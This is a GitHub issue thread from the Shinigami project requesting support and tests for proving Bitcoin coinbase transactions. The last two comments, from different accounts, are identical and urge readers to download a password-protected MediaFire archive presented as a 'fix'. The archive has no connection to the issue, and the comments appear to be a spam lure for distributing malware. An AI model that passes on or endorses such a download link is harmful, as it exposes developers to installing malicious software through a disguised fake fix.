### ISSUE TITLE
[feat] Coinbase transactions

### ISSUE THREAD

**Issue by b-j-roberts** [keep-starknet-strange/shinigami#173]
In Bitcoin the first transaction in each block is considered the "Coinbase transaction", and follows a specific format. We want to be able to support the proving of coinbase transactions with Shinigami.

This work should include tests for all the different types of coinbase transactions, and any functional changes that need to be made to shinigami to support them.

#### References
[learn coinbase transactions](https://learnmeabitcoin.com/technical/mining/coinbase-transaction/)

**Comment by EjembiEmmanuel** [comment]
@

**Comment by harsh-ps-2003** [comment]
Already started the work! Thanks

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
